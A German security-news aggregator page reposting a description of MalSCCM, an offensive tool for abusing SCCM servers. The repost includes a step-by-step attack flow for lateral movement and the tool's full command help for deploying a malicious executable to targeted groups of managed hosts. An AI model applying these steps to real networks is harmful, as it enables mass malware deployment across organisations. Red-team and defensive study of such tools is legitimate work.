Ausnahme gefangen: SSL certificate problem: certificate is not yet valid ๐Ÿ“Œ MalSCCM - Tool To Abuse Local Or Remote SCCM Servers To Deploy Malicious Applications
Team IT Security Nachrichtenportal Logo

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security
RSS Feed Symbol fรผr Team IT Security 800+ IT News als RSS Feed abonnieren



๐Ÿ“š MalSCCM - Tool To Abuse Local Or Remote SCCM Servers To Deploy Malicious Applications


๐Ÿ’ก Newskategorie: IT Security Nachrichten
๐Ÿ”— Quelle: kitploit.com


This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage. To use this tool your current process must have admin rights over the SCCM server.

Typically deployments of SCCM will either have the management server and the primary server on the same host, in which case the host returned from the locate command can be used as the primary server.

If that is not the case you will need to compromise the management host returned with locate so that you can then run locate again on that host and get the primary server hostname. Once you have that and admin access you are good to go!


Blog

For more information on usage of the tool, refer to the blog below.

Credits

Massive credit to PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) which this is all based off, this would not have been done without the work of @harmj0y, @jaredcatkinson, @enigma0x3, @mattifestation.

Attack Flow

  • Compromise client, use locate to find management server
  • Compromise management server, use locate to find primary server
  • use Inspect on primary server to view who you can target
  • Create a new device group for the machines you want to laterally move too
  • Add your targets into the new group
  • Create an application pointing to a malicious EXE on a world readable share
  • Deploy the application to the target group
  • Force the target group to checkin for updates
  • Profit...
  • Cleanup the application and deployment
  • Delete the group

Help menu

Commands listed below have optional parameters in <>. 

Attempt to find the SCCM management and primary servers:
    MalSCCM.exe locate

Inspect the primary server to gather SCCM information:
    MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>

Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
    MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
    MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
    MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
    MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySite   Hostname>

Create/Deploy/Delete malicious applications:
    MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
    MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
    MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
    MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
    MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>

Force devices of a group to checkin within a couple minutes:
    MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>


...



Sharing is caring on Social Media

๐Ÿ”— Reddit
๐Ÿ”— Telegram
๐Ÿ”— LinkedIn
๐Ÿ”— Xing
๐Ÿ”— Twitter
๐Ÿ”— Whatsapp
๐Ÿ”— Facebook
๐Ÿ”— Flipboard

Join the Team IT Security Community

๐Ÿ”— "IT Sicherheit" Reddit-Gruppe
๐Ÿ”— "IT Sicherheit" Telegramm-Seite

๐Ÿ“Œ How to Deploy Fonts Using SCCM [3 Simpleย Steps]


๐Ÿ“ˆ 32.63 Punkte

๐Ÿ“Œ Attackers Use Malicious IIS Extensions to Deploy Covert Backdoors into Exchange Servers


๐Ÿ“ˆ 28.49 Punkte

๐Ÿ“Œ Hackers Deploy Malicious OAuth Apps to Compromise Email Servers, Spread Spam


๐Ÿ“ˆ 28.49 Punkte

๐Ÿ“Œ iOS Malicious Bit Hunter - A Malicious Plug-In Detection Eng ine For iOS Applications


๐Ÿ“ˆ 26.72 Punkte

๐Ÿ“Œ On-Premises Servers Products are Here! Introducing the Applications and On-Premises Servers Bug Bounty Program


๐Ÿ“ˆ 25.64 Punkte

๐Ÿ“Œ On-Premises Servers Products are Here! Introducing the Applications and On-Premises Servers Bug Bounty Program


๐Ÿ“ˆ 25.64 Punkte

๐Ÿ“Œ The independent inquiry into child sexual abuse (iicsa) has been fined ยฃ200,000 for revealing identities of abuse victims in a mass email.


๐Ÿ“ˆ 24.79 Punkte

๐Ÿ“Œ Google Introduces Abuse Research Grants Program For Product Abuse Issues


๐Ÿ“ˆ 24.79 Punkte

๐Ÿ“Œ Ryan s. lin pleaded guilty to cyberstalking, distribution of child abuse imagery, hoax bomb threats, computer fraud and abuse, and id theft.


๐Ÿ“ˆ 24.79 Punkte

๐Ÿ“Œ Signifyd Return Abuse Prevention gives merchants the flexibility to customize their return-abuse response


๐Ÿ“ˆ 24.79 Punkte

๐Ÿ“Œ Hackers Abuse Outdated Eval PHP WordPress Plugin To Deploy Backdoors


๐Ÿ“ˆ 23.58 Punkte

๐Ÿ“Œ Attackers Abuse Kubernetes RBAC to Deploy Persistent Backdoor


๐Ÿ“ˆ 23.58 Punkte

๐Ÿ“Œ Hackers Abuse Microsoftโ€™s MSBuild Platform to Deploy Malware


๐Ÿ“ˆ 23.58 Punkte

๐Ÿ“Œ Hackers Abuse Google Search Ads to Deploy Bonanza Malware


๐Ÿ“ˆ 23.58 Punkte

๐Ÿ“Œ CVE-2024-22331 | IBM UrbanCode Deploy/DevOps Deploy Windows Agent Installation information disclosure (XFDB-279971)


๐Ÿ“ˆ 22.37 Punkte

๐Ÿ“Œ Malicious Chrome Plugin Let Remote Attacker Steal keystroke and Inject Malicious Code


๐Ÿ“ˆ 22.05 Punkte

๐Ÿ“Œ Parallels Mac Management fรผr Microsoft SCCM integriert Apple DEP


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ Parallels Mac Management fรผr Microsoft SCCM integriert Apple DEP


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ Parallels Mac Management 6 fรผr Microsoft SCCM verfรผgbar


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ Updates und neue Versionen fรผr SCCM 2016 installieren


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ Parallels stellt Mac Management 7 fรผr SCCM vor


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ Endpoint Protection mit SCCM


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ SCCM and Intuneโ€”now managing 175 million devices!


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ SCCM and Intuneโ€”now managing 175 million devices!


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ Microsoft Endpoint Manager: Bringing together SCCM and Intune capabilities (Microsoft Ignite)


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ Anwendungen verteilen mit SCCM (1)


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ Anwendungen verteilen mit SCCM (2)


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ Anwendungen verteilen mit SCCM (3)


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ Abusing Microsoft System Center Configuration Manager (SCCM)


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ Tanium vs SCCM | UpGuard


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ MICROSOFT SCCM IS BLOCKING YOUR FLEXIBILITY?


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ WSUS vs. SCCM vs. Intune Comparison โ€“ Benefits, Ease of Use, and Deployment


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ SharpSCCM - A C# Utility For Interacting With SCCM


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ Microsoft SCCM blockiert Sie in Ihrer Flexibilitรคt?


๐Ÿ“ˆ 21.44 Punkte

๐Ÿ“Œ 0x8007000f: SCCM Task Sequence Error [Fix Guide]


๐Ÿ“ˆ 21.44 Punkte











matomo

Kontakt

24/7 kontakt@tsecurity.de

Weitere Informationen

Google Android Playstore Download Button fรผr Team IT Security
๐Ÿ”— Impressum
๐Ÿ”— Datenschutz
Paypal Spenden fรผr Projekt

Social Media

๐Ÿ”— Facebook
๐Ÿ”— Reddit
๐Ÿ”— Team IT Security als Elektron App
๐Ÿ”— © 2015-2023 Team IT Security Nachrichtenportal รผber Cybersecurity
๐Ÿ”— CMS "myDraft" a PHP Portal Software